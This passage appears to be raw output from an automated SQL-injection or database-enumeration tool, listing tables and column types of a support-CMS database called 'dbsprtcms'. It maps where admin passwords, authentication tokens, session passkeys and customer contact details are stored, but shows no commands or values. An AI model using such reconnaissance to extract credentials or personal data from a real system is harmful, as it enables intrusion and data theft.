| scuh_principal | nvarchar |
| scuh_rating | int |
| scuh_result | int |
| scuh_row_guid | char |
| scuh_session | char |
| scuh_solved | int |
| scuh_timestamp | datetime |
| scuh_verb | nchar |
| scuh_view | int |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_msi_package_contents
[3 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| msi_pc_file_name | nvarchar |
| msi_pc_file_version | nvarchar |
| msi_pc_product_code | char |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nexus_users
[5 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| admin_address | nvarchar |
| application | nvarchar |
| application_data | nvarchar |
| client_guid | nvarchar |
| user_address | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_notifications
[4 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| sin_event_guid | char |
| sin_message | nvarchar |
| sin_target | nvarchar |
| sin_type | int |
+----------------+----------+
Database: dbsprtcms
Table: dbo.SDC_UserInfo
[4 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | char |
| pAgentVersion | nvarchar |
| pName | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.old_sprt_systune_content_usage
[11 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| stcu_content_guid | char |
| stcu_content_version | int |
| stcu_float1 | float |
| stcu_float2 | float |
| stcu_main_result | int |
| stcu_posttest_result | int |
| stcu_pretest_result | int |
| stcu_row_guid | char |
| stcu_session_guid | char |
| stcu_string1 | nvarchar |
| stcu_string2 | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.SDC_SILBasic
[14 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| elementNum | int |
| incidentID | char |
| pSDC_SILBasic_Binding | nvarchar |
| psilAppCodeName | nvarchar |
| psilAppMinorVersion | nvarchar |
| psilAppName | nvarchar |
| psilAppVersion | nvarchar |
| psilBrowserName | nvarchar |
| psilConnType | nvarchar |
| psilCpu | nvarchar |
| psilOsName | nvarchar |
| psilPlatform | nvarchar |
| psilSecurityPolicy | nvarchar |
| psilUserAgent | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_cr_profile_map
[4 columns]
+------------------------+------+
| Column | Type |
+------------------------+------+
| cpm_map_attrib | int |
| cpm_map_row_guid | char |
| cpm_prof_category_guid | char |
| cpm_profile_guid | char |
+------------------------+------+
Database: dbsprtcms
Table: dbo.sprt_pcsoln_log
[7 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| pcs_ld_clientguid | char |
| pcs_ld_dropguid | char |
| pcs_ld_etime | datetime |
| pcs_ld_guid | char |
| pcs_ld_state | int |
| pcs_ld_state_str | nvarchar |
| pcs_ld_stime | datetime |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.SMA_NavInfo
[12 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| elementNum | int |
| incidentID | char |
| pContinueLater | nvarchar |
| pSMA_NavInfo_Binding | nvarchar |
| pStepEndDate | datetime |
| pStepListName | nvarchar |
| pStepName | nvarchar |
| pStepNum | int |
| pStepProgress | int |
| pStepStartDate | datetime |
| pStepSuccess | nvarchar |
| pStepTimeMsec | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_csr_rpt
[19 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| chcsr_analyst | nvarchar |
| chcsr_analyst_fixed | int |
| chcsr_analyst_not_fixed | int |
| chcsr_analyst_not_problem | int |
| chcsr_analyst_user_left | int |
| chcsr_avg_handle_time | float |
| chcsr_interval_start_time | datetime |
| chcsr_interval_type | char |
| chcsr_no_autoesc | int |
| chcsr_no_escalated | int |
| chcsr_no_transferin | int |
| chcsr_queue | nvarchar |
| chcsr_sessions_completed | int |
| chcsr_sessions_initiated | int |
| chcsr_time_ahtnotransfer | float |
| chcsr_time_ahttransfer | float |
| chcsr_time_available | float |
| chcsr_time_logged_in | float |
| chcsr_user_fixed | int |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_asset_type
[4 columns]
+-----------------------------+----------+
| Column | Type |
+-----------------------------+----------+
| adat_asset_type_attrib | varchar |
| adat_asset_type_description | nvarchar |
| adat_asset_type_id | char |
| adat_asset_type_name | char |
+-----------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_tabinfo
[8 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| sitbin_queue_guid | char |
| sitbin_tab_disabled | char |
| sitbin_tab_guid | char |
| sitbin_tab_helpstring | nvarchar |
| sitbin_tab_name | nvarchar |
| sitbin_tab_pos | int |
| sitbin_tab_user | nvarchar |
| sitbin_tab_xml | ntext |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_field
[6 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| sccf_content_guid | char |
| sccf_field_name | nvarchar |
| sccf_field_value_char | nvarchar |
| sccf_field_value_int | int |
| sccf_row_guid | char |
| sccf_version | int |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_agent_update_log
[7 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| aul_client_guid | nvarchar |
| aul_event_timestamp | datetime |
| aul_event_type | nvarchar |
| aul_update_guid | char |
| aul_update_level | int |
| aul_update_status | nvarchar |
| aul_user_name | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_users_archive
[20 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| assigned_date | datetime |
| closed_date | datetime |
| cmd | varchar |
| created_date | datetime |
| email_addr | nvarchar |
| esc_in | int |
| esc_out | int |
| fixed | int |
| id | int |
| ident | varchar |
| last_modified | datetime |
| problem | nvarchar |
| queue | nvarchar |
| rc | varchar |
| room | varchar |
| si | varchar |
| status | varchar |
| typing | varchar |
| user_name | nvarchar |
| user_type | varchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_usage_old
[15 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| scus_admin_weight | int |
| scus_comment | nvarchar |
| scus_content_guid | char |
| scus_content_version | int |
| scus_data | nvarchar |
| scus_position | int |
| scus_principal | nvarchar |
| scus_rating | int |
| scus_result | int |
| scus_row_guid | char |
| scus_session | char |
| scus_solved | int |
| scus_timestamp | datetime |
| scus_verb | nchar |
| scus_view | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.HoldTab1
[14 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| Avg_index_Size | float |
| Avg_row_size_B | float |
| database_id | smallint |
| DB | nvarchar |
| Ext_Frag_Pct | float |
| index_id | int |
| Index_Name | nvarchar |
| Index_Type | nvarchar |
| Int_Frag | float |
| object_id | int |
| Object_Name | nvarchar |
| Page_Count | bigint |
| Record_Count | bigint |
| Schema_Name | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.SMA_SurveyInfo
[6 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| elementNum | int |
| incidentID | char |
| pcalls_avoided | nvarchar |
| pcustomer_satisfaction | nvarchar |
| pinstallation_process | nvarchar |
| pSMA_SurveyInfo_Binding | nvarchar |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_admin_request_filter
[15 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| nc_arf_admin_request_guid | char |
| nc_arf_catalog_guid | char |
| nc_arf_catalog_type | nvarchar |
| nc_arf_concurrent_count | int |
| nc_arf_expression | nvarchar |
| nc_arf_filter_criteria | nvarchar |
| nc_arf_filter_type | nvarchar |
| nc_arf_guid | char |
| nc_arf_max_concurrent | int |
| nc_arf_pattr_guid | char |
| nc_arf_plan_guid | char |
| nc_arf_preceding_ar_guid | char |
| nc_arf_request | nvarchar |
| nc_arf_rpc_type | int |
| nc_arf_status | int |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.mydata
[1 column]
+--------+---------+
| Column | Type |
+--------+---------+
| line | varchar |
+--------+---------+
Database: dbsprtcms
Table: dbo.SMA_get_accountinfo
[12 columns]
+------------------------------+----------+
| Column | Type |
+------------------------------+----------+
| elementNum | int |
| incidentID | char |
| paccount_no | nvarchar |
| pavailable_services | nvarchar |
| pcurrent_services | nvarchar |
| pdevice_registered | nvarchar |
| pfirst_name | nvarchar |
| plast_name | nvarchar |
| pphone_number | nvarchar |
| ppostal_code | nvarchar |
| pppp_username | nvarchar |
| pSMA_get_accountinfo_Binding | nvarchar |
+------------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_systune_pageflow
[2 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| stpf_pageflow | nvarchar |
| stpf_session_guid | char |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_files
[10 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| spf_bulletin_id | nvarchar |
| spf_dest | nvarchar |
| spf_down | bigint |
| spf_lang | nvarchar |
| spf_lastupdated | datetime |
| spf_patch_guid | char |
| spf_patch_name | nvarchar |
| spf_row_guid | char |
| spf_size | bigint |
| spf_src | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_supportflows
[5 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| svsf_geography_guid | char |
| svsf_row_guid | char |
| svsf_supportflow | ntext |
| svsf_type | nvarchar |
| svsf_user_type | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_admin
[9 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| nc_admin_display_name | nvarchar |
| nc_admin_group | nvarchar |
| nc_admin_id | int |
| nc_admin_name | nchar |
| nc_admin_password | nchar |
| nc_admin_rowguid | char |
| nc_admin_userguid | char |
| nc_session_guid | char |
| nc_session_time | datetime |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_bulletin
[7 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| spb_bulletin_guid | char |
| spb_bulletin_id | nvarchar |
| spb_bulletin_title | nvarchar |
| spb_comments | nvarchar |
| spb_qnumber_list | nvarchar |
| spb_summary | ntext |
| spb_timestamp | datetime |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sv_service_devices
[5 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| svsd_device_id | nvarchar |
| svsd_device_ryg | int |
| svsd_display_order | int |
| svsd_service_device_guid | char |
| svsd_session_service_guid | char |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sma_protocol_ado
[7 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| smaa_authentication | nvarchar |
| smaa_cmd_guid | char |
| smaa_database | nvarchar |
| smaa_password | nvarchar |
| smaa_provider | nvarchar |
| smaa_server | nvarchar |
| smaa_username | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_Baseboard
[8 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pManufacturer | nvarchar |
| pProduct | nvarchar |
| pSerialNumber | nvarchar |
| pTag | nvarchar |
| pVersion | nvarchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_index
[17 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| client_guid | nvarchar |
| group_id | int |
| index_id | int |
| ip_address | nvarchar |
| issue_type | nvarchar |
| operator_type | nvarchar |
| problem | nvarchar |
| resolution_notes | nvarchar |
| si_submission_rev | int |
| smartissue_guid | nvarchar |
| status | nvarchar |
| tier_id | nvarchar |
| time_close | datetime |
| time_created | datetime |
| time_open | datetime |
| time_updated | datetime |
| user_guid | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_server_properties
[7 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| nc_sp_default_value | nvarchar |
| nc_sp_description | nvarchar |
| nc_sp_display_name | nvarchar |
| nc_sp_guid | char |
| nc_sp_name | nvarchar |
| nc_sp_type | nvarchar |
| nc_sp_value | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_msi_packages_32bit
[5 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| msi32_p_exe_data | image |
| msi32_p_exe_date | datetime |
| msi32_p_exe_filename | nvarchar |
| msi32_p_exe_size | bigint |
| msi32_p_product_code | char |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_vulnerability_log
[5 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| spvl_bulletin_id | nvarchar |
| spvl_client_guid | char |
| spvl_patch_name | nvarchar |
| spvl_qnumber | nvarchar |
| spvl_timestamp | datetime |
+------------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_POTSModem
[10 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pDeviceType | nvarchar |
| pDriverDate | nvarchar |
| pMaxBaudRateToPhone | int |
| pModel | nvarchar |
| pName | nvarchar |
| pProviderName | nvarchar |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_request
[8 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| nc_req_admin_request_guid | char |
| nc_req_envelope_id | char |
| nc_req_guid | char |
| nc_req_initiator | int |
| nc_req_rpc_type | int |
| nc_req_start_time | datetime |
| nc_req_status | int |
| nc_req_transaction_guid | char |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nexus_xref
[20 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| snx_analyst | nvarchar |
| snx_analyst_type | int |
| snx_auth_token | nvarchar |
| snx_client_guid | nvarchar |
| snx_client_os | nvarchar |
| snx_connection_type | int |
| snx_group_guid | char |
| snx_ip_address | nvarchar |
| snx_iss_guid | char |
| snx_last_update_type | int |
| snx_nexus_user | nvarchar |
| snx_notes | nvarchar |
| snx_other | nvarchar |
| snx_problem | nvarchar |
| snx_session | char |
| snx_status | int |
| snx_time_closed | datetime |
| snx_time_in | datetime |
| snx_time_picked | datetime |
| snx_user_type | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_report_history
[9 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| sra_elapsed | int |
| sra_endtime | datetime |
| sra_error_message | nvarchar |
| sra_report_guid | char |
| sra_row_guid | char |
| sra_rows_output | int |
| sra_rows_total | int |
| sra_user_guid | nvarchar |
| sra_variables | ntext |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_systune_content_usage
[17 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| stcu_content_guid | char |
| stcu_content_version | int |
| stcu_float1 | float |
| stcu_float2 | float |
| stcu_float3 | float |
| stcu_float4 | float |
| stcu_float5 | float |
| stcu_float6 | float |
| stcu_main_result | int |
| stcu_posttest_result | int |
| stcu_pretest_result | int |
| stcu_row_guid | char |
| stcu_session_guid | char |
| stcu_string1 | nvarchar |
| stcu_string2 | nvarchar |
| stcu_string3 | nvarchar |
| stcu_string4 | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_query
[9 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| scq_nresults | int |
| scq_qt_attrib | int |
| scq_query | nvarchar |
| scq_query_guid | char |
| scq_related_query | nvarchar |
| scq_row_guid | char |
| scq_rquery_attrib | int |
| scq_session | char |
| scq_time | datetime |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_trigger_filter_properties
[4 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| stp_name | nvarchar |
| stp_row_guid | char |
| stp_stfguid | char |
| stp_value | nvarchar |
+--------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_userinfo_archive
[10 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| scui_audience | nchar |
| scui_client_guid | char |
| scui_entry | nvarchar |
| scui_httphost | nvarchar |
| scui_logonuser | nvarchar |
| scui_remoteaddr | nvarchar |
| scui_row_guid | char |
| scui_scriptname | nvarchar |
| scui_session | char |
| scui_timestamp | datetime |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sma_protocol_get
[6 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| smag_auth_type | nvarchar |
| smag_cmd_guid | char |
| smag_domain | nvarchar |
| smag_get_url | nvarchar |
| smag_password | nvarchar |
| smag_username | nvarchar |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_folder
[9 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| scf_attributes | int |
| scf_folder_desc | nvarchar |
| scf_folder_guid | char |
| scf_folder_row_guid | char |
| scf_folder_title | nvarchar |
| scf_lft | int |
| scf_parent_guid | char |
| scf_retired | int |
| scf_rgt | int |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.old_sprt_systune_sessions
[7 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| sts_analyst_guid | char |
| sts_end | datetime |
| sts_macid | char |
| sts_ra_guid | char |
| sts_session_guid | char |
| sts_start | datetime |
| sts_username | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_affinity
[4 columns]
+--------------------+------+
| Column | Type |
+--------------------+------+
| scaf_content_left | char |
| scaf_content_right | char |
| scaf_row_guid | char |
| scaf_session_count | int |
+--------------------+------+
Database: dbsprtcms
Table: dbo.SDC_Applications
[7 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| elementNum | int |
| incidentID | char |
| pApplication | nvarchar |
| pAppPath | nvarchar |
| pPID | nvarchar |
| pProductName | nvarchar |
| pProductVersion | nvarchar |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ad_apps_groups
[5 columns]
+--------------------+------+
| Column | Type |
+--------------------+------+
| adag_apps_group_id | char |
| adag_apps_id | char |
| adag_apps_lic_id | char |
| adag_apps_quantity | int |
| adag_group_id | char |
+--------------------+------+
Database: dbsprtcms
Table: dbo.sprt_ad_meter_application
[4 columns]
+-------------------------+----------+
| Column | Type |
+-------------------------+----------+
| adma_application_action | nvarchar |
| adma_application_exe | nvarchar |
| adma_application_guid | char |
| adma_application_title | nvarchar |
+-------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_param_types
[4 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| nc_rpcpt_id | int |
| nc_rpcpt_name | nvarchar |
| nc_rpcpt_rowguid | char |
| nc_rpcpt_sub_types | nvarchar |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_trenddata_sla
[10 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| cts_aht | float |
| cts_avgwaittime | float |
| cts_guid | char |
| cts_maxwaittime | float |
| cts_nochatshandled | int |
| cts_nochatsqueued | int |
| cts_noescalated_in | int |
| cts_noescalated_out | int |
| cts_queuename | nvarchar |
| cts_timestamp | datetime |
+---------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_query_results
[3 columns]
+-------------------+------+
| Column | Type |
+-------------------+------+
| scqr_content_guid | char |
| scqr_query_guid | char |
| scqr_row_guid | char |
+-------------------+------+
Database: dbsprtcms
Table: dbo.sprt_event_log
[7 columns]
+------------------------+----------+
| Column | Type |
+------------------------+----------+
| ev_l_client_guid | nvarchar |
| ev_l_event_description | nvarchar |
| ev_l_event_guid | char |
| ev_l_event_name | nvarchar |
| ev_l_event_time | datetime |
| ev_l_event_version | int |
| ev_l_user_guid | nvarchar |
+------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_userinfo
[10 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| scui_audience | nchar |
| scui_client_guid | char |
| scui_entry | nvarchar |
| scui_httphost | nvarchar |
| scui_logonuser | nvarchar |
| scui_remoteaddr | nvarchar |
| scui_row_guid | char |
| scui_scriptname | nvarchar |
| scui_session | char |
| scui_timestamp | datetime |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_exported_articles
[5 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| sea_content_guid | char |
| sea_export_date | datetime |
| sea_gms_workflow | nvarchar |
| sea_translation_comments | nvarchar |
| sea_translation_priority | nvarchar |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_metadataFields
[2 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| ssd_content_property_name | nvarchar |
| ssd_row_guid | char |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.SMA_GeneralInfo
[17 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| elementNum | int |
| incidentID | char |
| pconnectivity | nvarchar |
| pinstall_compliance | nvarchar |
| pinstall_flow | nvarchar |
| pinstall_lang | nvarchar |
| pinstall_timezone | nvarchar |
| pinstall_usertype | nvarchar |
| pinstall_version | nvarchar |
| pisp | nvarchar |
| plastpage_visited | nvarchar |
| pnetwork_nic_type | nvarchar |
| pSMA_GeneralInfo_Binding | nvarchar |
| pspeedtest1_download | nvarchar |
| pspeedtest1_upload | nvarchar |
| ptech_id | nvarchar |
| ptech_name | nvarchar |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_wf_workflowscheme
[6 columns]
+--------------------------+----------+
| Column | Type |
+--------------------------+----------+
| scwfs_row_guid | char |
| scwfs_scheme_description | nvarchar |
| scwfs_scheme_guid | char |
| scwfs_scheme_name | nvarchar |
| scwfs_scheme_opts | int |
| scwfs_scheme_type | int |
+--------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_usage_renamed
[15 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| scus_admin_weight | int |
| scus_comment | nvarchar |
| scus_content_guid | char |
| scus_content_version | int |
| scus_data | nvarchar |
| scus_position | int |
| scus_principal | nvarchar |
| scus_rating | int |
| scus_result | int |
| scus_row_guid | char |
| scus_session | char |
| scus_solved | int |
| scus_timestamp | datetime |
| scus_verb | nchar |
| scus_view | int |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.SDC_CTSInstances
[9 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pCfgID | int |
| pCTSID | nvarchar |
| pCTSType | int |
| pModificationTime | datetime |
| pNote | nvarchar |
| pSearchKey | nvarchar |
| pStatus | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_session
[10 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| sess_dbdate | datetime |
| sess_expdate | datetime |
| sess_lcid | varchar |
| sess_passkey | char |
| sess_row_guid | char |
| sess_ssgnames | ntext |
| sess_ssguids | varchar |
| sess_ssid | char |
| sess_ssuser | nvarchar |
| sess_tzoffset | varchar |
+---------------+----------+
Database: dbsprtcms
Table: dbo.sprt_chat_contents
[9 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| chcc_detail | nvarchar |
| chcc_guid | char |
| chcc_id | int |
| chcc_path | nvarchar |
| chcc_shortcut | nvarchar |
| chcc_title | nvarchar |
| chcc_type | nvarchar |
| chcc_user_guid | char |
| chcc_userid | int |
+----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_si_purge_kernel
[26 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| sipk_client_guid | char |
| sipk_connectivity | nvarchar |
| sipk_created_by | nvarchar |
| sipk_creator_guid | char |
| sipk_disposition | nvarchar |
| sipk_ext_ids | nvarchar |
| sipk_iss_guid | char |
| sipk_iss_id | int |
| sipk_iss_origin | varchar |
| sipk_iss_type | char |
| sipk_long_desc | nvarchar |
| sipk_prod_id | int |
| sipk_reopen_count | int |
| sipk_severity | int |
| sipk_short_desc | nvarchar |
| sipk_status | nvarchar |
| sipk_t_archived | datetime |
| sipk_t_closed | datetime |
| sipk_t_created | datetime |
| sipk_t_first_disp | datetime |
| sipk_t_last_disp | datetime |
| sipk_t_modified | datetime |
| sipk_t_reopened | datetime |
| sipk_user_email_addr | nvarchar |
| sipk_user_guid | char |
| sipk_user_name | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_ea_counter
[22 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| seal_analyst_name | nvarchar |
| seal_data1 | nvarchar |
| seal_data2 | nvarchar |
| seal_event | char |
| seal_event_data | nvarchar |
| seal_event_time | datetime |
| seal_id | int |
| seal_modified_time | datetime |
| seal_no1 | int |
| seal_no2 | int |
| seal_no_bounced | int |
| seal_no_escalated_in | int |
| seal_no_escalated_out | int |
| seal_no_handled | int |
| seal_session_guid | char |
| seal_session_time | datetime |
| seal_time1 | datetime |
| seal_time2 | datetime |
| seal_total_active_time | bigint |
| seal_total_available_time | bigint |
| seal_total_handle_time | bigint |
| seal_total_working_time | bigint |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_nc_firmwarecatalog
[15 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| nc_fc_blob | image |
| nc_fc_file_name | nvarchar |
| nc_fc_filtercondition | nvarchar |
| nc_fc_firmwareversion | nvarchar |
| nc_fc_guid | char |
| nc_fc_manufacturer | nvarchar |
| nc_fc_oui | nvarchar |
| nc_fc_product_class | nvarchar |
| nc_fc_serial_number | nvarchar |
| nc_fc_softwareversion | nvarchar |
| nc_fc_specversion | nvarchar |
| nc_fc_tested | int |
| nc_fc_url | nvarchar |
| nc_fc_user_guid | char |
| nc_fc_version | nvarchar |
+-----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_assets
[5 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| assetguid | char |
| assetname | nvarchar |
| assettype | nvarchar |
| group_id | char |
| status | nvarchar |
+-----------+----------+
Database: dbsprtcms
Table: dbo.sprt_ea_mails
[10 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| seam_body | text |
| seam_flags | int |
| seam_from_addr | varchar |
| seam_from_user | nvarchar |
| seam_header | varchar |
| seam_iss_guid | char |
| seam_row_guid | char |
| seam_subject | nvarchar |
| seam_time_in | datetime |
| seam_type | int |
+----------------+----------+
Database: dbsprtcms
Table: dbo.SDCAsset_Monitor
[7 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| elementNum | int |
| incidentID | nchar |
| pDescription | nvarchar |
| pDeviceID | nvarchar |
| pMonitorManufacturer | nvarchar |
| pMonitorType | nvarchar |
| pName | nvarchar |
+----------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_pcsoln_drops
[7 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| pcs_drp_desc | nvarchar |
| pcs_drp_guid | char |
| pcs_drp_level | int |
| pcs_drp_name | nvarchar |
| pcs_drp_sln | image |
| pcs_drp_slntype | nvarchar |
| pcs_drp_trguid | char |
+-----------------+----------+
Database: dbsprtcms
Table: dbo.sprt_tool_log
[8 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| tlog_data | nvarchar |
| tlog_description | nvarchar |
| tlog_event | nvarchar |
| tlog_imagedata | image |
| tlog_sesid | char |
| tlog_siid | char |
| tlog_time | datetime |
| tlog_tool | nvarchar |
+------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_sc_assign
[6 columns]
+------------------------+-------+
| Column | Type |
+------------------------+-------+
| scas_content_guid | char |
| scas_content_type_guid | char |
| scas_folder_guid | char |
| scas_row_guid | char |
| scas_scheme_guid | char |
| scas_scheme_type | nchar |
+------------------------+-------+
Database: dbsprtcms
Table: dbo.sprt_sc_content_lock
[2 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| sccl_content_guid | char |
| sccl_locked_by | nvarchar |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.SDC_Environments
[4 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| elementNum | int |
| incidentID | char |
| pEnvVar | nvarchar |
| pValue | nvarchar |
+------------+----------+
Database: dbsprtcms
Table: dbo.sprt_pivot
[1 column]
+--------+------+
| Column | Type |
+--------+------+
| x | int |
+--------+------+
Database: dbsprtcms
Table: dbo.sprt_si_type_classes
[3 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| sitc_class_guid | char |
| sitc_descriptions | nvarchar |
| sitc_type_guid | char |
+-------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_link_spproduct
[5 columns]
+--------------------+------+
| Column | Type |
+--------------------+------+
| spls_ordinal | int |
| spls_prod_id | int |
| spls_row_guid | char |
| spls_sp_id | int |
| spls_spp_link_guid | char |
+--------------------+------+
Database: dbsprtcms
Table: dbo.sprt_sc_languagemap
[9 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| default_slc | char |
| sclm_ct_code | char |
| sclm_digit_Code | char |
| sclm_folder_guid | char |
| sclm_iso_code | char |
| sclm_language_name | nvarchar |
| sclm_lg_code | char |
| sclm_row_guid | char |
| sclm_seg_code | char |
+--------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_patch_supercedes
[6 columns]
+---------------------------+----------+
| Column | Type |
+---------------------------+----------+
| spsu_bulletin_id | nvarchar |
| spsu_patch_name | nvarchar |
| spsu_qnumber | nvarchar |
| spsu_row_guid | char |
| spsu_superced_description | nvarchar |
| spsu_superced_id | int |
+---------------------------+----------+
Database: dbsprtcms
Table: dbo.sprt_job_log
[14 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| client_guid | nvarchar |
| dna_server_name | nvarchar |
| job_descriptions | nvarchar |
| job_exit | nvarchar |
| job_id | nvarchar |
| job_instance_id | nvarchar |
| job_log_id | int |
| job_name | nvarchar |
| job_status | nvarchar |
